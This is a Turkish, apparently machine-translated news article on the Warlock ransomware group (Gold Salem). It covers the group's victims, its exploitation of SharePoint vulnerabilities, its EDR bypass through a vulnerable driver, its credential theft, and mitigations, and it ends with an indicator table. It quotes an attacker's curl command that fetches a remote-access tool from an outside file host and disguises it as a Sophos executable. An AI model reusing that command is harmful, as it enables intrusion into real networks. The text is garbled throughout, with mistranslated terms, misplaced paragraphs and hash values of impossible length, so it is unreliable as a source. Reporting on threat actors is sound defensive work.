Warlock Fidye Yazılımı Meydan Okalı Gold Salem Networks ve Bypassed Güvenlik Çözümleri aracılığıyla dağıtıldı


Counter Tehdit Unit ™ (CTU) araştırmacıları, CTU’nun Gold Salem olarak belirlediği Warlock Group olarak bilinen sofistike bir tehdit oyuncusu izliyor.

Mart 2025’ten bu yana, grup kurumsal ağlardan ödün verdi ve özel büyücü fidye yazılımlarını dağıtmak için güvenlik çözümlerini atladı.

Microsoft bu kolektifi Storm-2603 olarak ifade ederken ve “Çin merkezli bir tehdit aktörü olmak için ılımlı bir güvenle” ilişkilendirirken, CTU araştırmacıları herhangi bir coğrafi atıf doğrulamamıştır.

Eylül 2025 ortası boyunca Gold Salem, 60 kurbanı özel sızıntı alanına yayınladı ve bu yıl kurban sayısının fidye yazılımı operasyonlarının orta sınıfına yerleştirdi.

Hedefler, Kuzey Amerika, Avrupa ve Güney Amerika’da küçük ticari firmalar, devlet kurumları ve çokuluslu şirketleri kapsamaktadır.

Karakteristik bir şekilde, grup 8 Eylül’e kadar Çin ve Rus organizasyonlarından kaçındı ve sızıntı alanında elektrik üretim sektöründe Rusya merkezli bir mühendislik hizmetleri sağlayıcısı ortaya çıktı.

Bu içerme, aktörlerin fidye yazılımı gaspçılarını agresif bir şekilde takip eden dış yargı bölgelerinden çalışabileceğini göstermektedir.

Gold Salem’in ev sahipliği yapan sızıntı sitesi kurban listeleri ve 16 Eylül itibariyle sadece 19 kurbanın (%32) çalınan verileri yayınlandığı, 27’sinin (%45) özel alıcılara satıldığı bildirildi.

16 Eylül 2025 itibariyle Gold Salem Sızıntı Sitesi.
16 Eylül 2025 itibariyle altın salem sızıntı sitesi.

Gold Salem, farklı fidye yazılımı operasyonları tarafından tehlikeye atılan kurbanların isimlerini yayınladı.

İlk Erişim ve Tradecraft

Grup ilk olarak Rampa Yeraltı Forumu’ndaki Haziran 2025 tarihli bir yazı aracılığıyla halka açık bir şekilde ortaya çıktı, kurumsal uygulamalar için istismarlar (Veeam, ESXI, SharePoint) ve uç nokta algılama ve yanıt sistemlerini öldürmek için araçlar istedi.

Bu tür rakamlar şişirilebilir ve daha önce listelenen üç kurban kaldırılmıştır, bu da olası veri doğrulama veya ödeme ayarlamalarını gösterir. Grubun sızıntı sitesi, her kurbana, hızlı bir ödemeye baskı yapmak için genellikle listeden 12-14 gün, fidye geri sayım tarihi atar.

Golddown tarihleri ​​16 Eylül 2025 itibariyle Gold Salem'in DLS'sinde listelenmiştir.
16 Eylül 2025 itibariyle Gold Salem’in DLS’sinde listelenen geri sayım tarihleri.

Bu görevlerin, hizmet olarak fidye yazılımı modeli için doğrudan müdahaleleri veya bağlı kuruluşların işe alımını hedeflediği belirsizliğini korumaktadır.

CTU araştırmacıları, Araç Kıyısı istismarı zincirini kullanarak Microsoft SharePoint’ten yararlanarak CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 ve CVE-2025-53771’den yararlanarak ASPX web kabuğunu dikti. Bu kabuk aracılığıyla, saldırganlar aşağıdakiler gibi komutlar yürüttüler:

textcurl -L -o c:\\users\\public\\Sophos\\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt  

Bu, kalıcı uzaktan erişim sağlayan Golang tabanlı bir WebSockets sunucusunu indirdi. Grup, savunmasız bir Baidu antivirüs sürücüsünü (CVE-2024-51324) googleapiutil64.sys’e yeniden adlandırarak EDR’yi atladı.

Kontratür sonrası faaliyetler, Mimikatz’ın LSASS belleğini hedefleyen kimlik bilgisi hasadı, Psexec ve Impacket aracılığıyla yanal hareket ve Warlock yükünün grup ilkesi nesneleri aracılığıyla dağıtılmasını içeriyordu.

Ağustos ayında Gold Salem, görsel stüdyo kodu ağ tünelleri oluşturmak için açık kaynaklı Velociraptor DFIR aracını kötüye kullandı, uyarlanabilir araçlarını ve kötü amaçlı uçlar için meşru yardımcı programları yeniden kullanma istekliliğini gösterdi.

Hafifletme

Bu tehdide karşı savunmak için kuruluşlar internete bakan hizmetler için agresif bir yama sürdürmeli ve sürekli saldırı yüzey izlemesi uygulamalıdır.

Proaktif uç nokta izleme ve hızlı olay yanıtı, sıfır gün sömürüsünü tespit etmek için kritiktir. Sophos Koruma Troj/Webshel-F ve Troj/Warlock-B, ilgili etkinliği tanımlayabilir.

CTU araştırmacıları aşağıdaki göstergeleri kullanarak erişimi gözden geçirmeyi ve kısıtlamayı önerir:

Gösterge Tip Bağlam
BFBEAC96A385B1E5643EC0752B132506 MD5 ASPX Web Kabası Kullanılmış Tarama Sonrası Araç Kazası Sömürü
DE25BE0AFD53A1D274EC02E530362FC8E7DDD5 SHA1 ASPX Web Kabası Kullanılmış Tarama Sonrası Araç Kazası Sömürü
996C7BCEC3C12C3462220FC2C19D61CCC039005EF SHA256 ASPX Web Kabası Kullanılmış Tarama Sonrası Araç Kazası Sömürü
B3A099ECCA79503A0E4A154BD85D3E6B MD5 WebSockets Uzaktan Erişim Aracı (wsocks.exe.txt)
6d0cc6349a9510b52394ad3436d165ec5fba6a SHA1 WebSockets Uzaktan Erişim Aracı (wsocks.exe.txt)
A204A48496B54BCB7AE171AD43597B92B746B5 SHA256 WebSockets Uzaktan Erişim Aracı (wsocks.exe.txt)

Kuruluşlar bu karmaları ağa ve uç nokta telemetrisine karşı doğrulamalı ve yanal hareketi sınırlamak için sağlam segmentasyon sağlamalıdır.

Araç köyü sömürüsü belirtileri ve BYOVD teknikleri için sürekli tehdit avı, Gold Salem’in gelişen büyücü fidye yazılımı operasyonunun sağladığı riski daha da azaltabilir.

Bu hikayeyi ilginç bul! Daha fazla güncelleme almak için bizi LinkedIn ve X’te takip edin.



Source link